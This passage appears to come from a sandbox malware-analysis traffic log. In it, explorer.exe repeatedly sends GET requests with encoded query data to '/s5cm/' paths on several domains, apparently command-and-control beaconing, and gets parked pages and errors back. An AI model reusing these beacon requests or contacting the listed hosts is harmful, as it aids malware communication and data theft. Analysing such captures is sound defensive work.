72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
May 31, 2021 21:47:26.447997093 CEST	6402	IN	Data Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
May 31, 2021 21:47:26.448035955 CEST	6403	IN	Data Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
May 31, 2021 21:47:26.448072910 CEST	6404	IN	Data Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
May 31, 2021 21:47:26.448101044 CEST	6405	IN	Data Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c Data Ascii: s = t[language] \|\| t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49756	217.160.0.220	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:31.608781099 CEST	6406	OUT	GET /s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.votelaura.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:31.662095070 CEST	6407	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Mon, 31 May 2021 19:47:31 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
May 31, 2021 21:47:31.662133932 CEST	6407	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49759	52.14.32.15	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:36.980860949 CEST	6424	OUT	GET /s5cm/?IBZlYbB=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rtN8zJ9n3ADBSsMwQ==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.linjudama.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:37.119092941 CEST	6424	IN	HTTP/1.1 404 Not Found Date: Mon, 31 May 2021 19:47:37 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49763	91.184.0.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:43.109642982 CEST	6435	OUT	GET /s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.ursulaaubri.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:45.355377913 CEST	6436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Mon, 31 May 2021 19:47:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.16 X-UA-Compatible: IE=edge Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.ursulaaubri.com/s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49764	172.67.155.68	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:53.762582064 CEST	6437	OUT	GET /s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.500truyen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:47:54.242822886 CEST	6438	IN	HTTP/1.1 404 Not Found Date: Mon, 31 May 2021 19:47:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: ASP.NET CF-Cache-Status: DYNAMIC cf-request-id: 0a6590fd4000004a8cb38bd000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UhDPC%2BIwAHR%2FAmpk41aeCgSssWegLun0HOrEGekU6sqiqohaVPOxcAK1hxkC60iPl0tUCqN3p2uC2OIYiP2z5WTS4gSvgJ80qG%2B3dPigmVLRyRrtG2qyxLOoZ9a%2BKPw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6582b7753b114a8c-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-fami
May 31, 2021 21:47:54.242877960 CEST	6439	IN	Data Raw: 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 Data Ascii: ly:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head>
May 31, 2021 21:47:54.242906094 CEST	6439	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49766	154.208.179.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:47:59.729772091 CEST	6449	OUT	GET /s5cm/?IBZlYbB=yzW/lVzvyQ4hEaPsSPteS4HoLyeRwmnuz4XJRK+qZAqpfbP0DQ0qxoao81SCaQD7KmI2MjNCyA==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.ecms2019.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:48:00.028755903 CEST	6449	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 31 May 2021 19:47:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49767	208.91.197.27	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 31, 2021 21:48:05.377948999 CEST	6450	OUT	GET /s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo+Maj0Gmk9CoRfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw==&7no=4hLljrWPCjYL HTTP/1.1 Host: www.rnrsans.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 31, 2021 21:48:05.657037973 CEST	6452	IN	HTTP/1.1 200 OK Date: Mon, 31 May 2021 19:48:05 GMT Server: Apache Set-Cookie: vsid=919vr3700360855539153; expires=Sat, 30-May-2026 19:48:05 GMT; Max-Age=157680000; path=/; domain=www.rnrsans.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_PVw8U+vhOUgexmNodw4sowESuxgud+4kAu6hXL8N+dypThjFgv1fjJiQCk7DniyQC+i1vP8I6ZbIsZrFsH2gQg== Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 50 56 77 38 55 2b 76 68 4f 55 67 65 78 6d 4e 6f 64 77 34 73 6f 77 45 53 75 78 67 75 64 2b 34 6b 41 75 36 68 58 4c 38 4e 2b 64 79 70 54 68 6a 46 67 76 31 66 6a 4a 69 51 43 6b 37 44 6e 69 79 51 43 2b 69 31 76 50 38 49 36 5a 62 49 73 5a 72 46 73 48 32 67 51 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6e 72 73 61 6e 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6e 72 73 61 6e 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 Data Ascii: 49e5<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_PVw8U+vhOUgexmNodw4sowESuxgud+4kAu6hXL8N+dypThjFgv1fjJiQCk7DniyQC+i1vP8I6ZbIsZrFsH2gQg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.rnrsans.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.rnrsans.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0
May 31, 2021 21:48:05.657088995 CEST	6453	IN	Data Raw: 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6e 72 73 61 6e 73 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 31 59 33 55 6b 46 56 65 56 52 69 54 6c 42 6f 64 58 46 70 4f Data Ascii: px";imglog.src="http://www.rnrsans.com/sk-logabpstatus.php?a=a1Y3UkFVeVRiTlBodXFpOVoxR0NFbExNZWF3aFBMeEs1RGNjTlV0dSs0VUwrRlEzQkRBaGh0N1ljVWI3Rzd0Qy9xTEJRUmp5bTV3V3VTYThNMUJYZWRKNm92SmMyNmtHVlF1N0krVzBWOWs9&b="+abp;document.body.appendChild(img
May 31, 2021 21:48:05.657125950 CEST	6454	IN	Data Raw: 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6f 70 65 6e 2d 73 61 6e 73 2f 6f 70 65 Data Ascii: tf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;font-display: swap;}@font-face {font-family: "open-sans-bold";src: url("http://i4.cd
May 31, 2021 21:48:05.657165051 CEST	6456	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 Data Ascii: ont-size:12px; background:#fff;font-weight: 400;background: url(http://i4.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-attachment: fixed;}.top-strip .main-container{width:1150px; m
May 31, 2021 21:48:05.657191038 CEST	6457	IN	Data Raw: 38 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 7d 0d 0a 2e 73 65 61 72 63 68 62 6f 78 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 20 77 69 64 74 68 3a 34 30 30 70 78 3b 20 68 65 69 67 68 74 3a 33 37 70 78 3b 7d 0d 0a 2e 73 72 63 68 2d 74 Data Ascii: 800px;margin:0 auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; color: #000; padding: 0 10px; outline: none; border: none}.srch-b
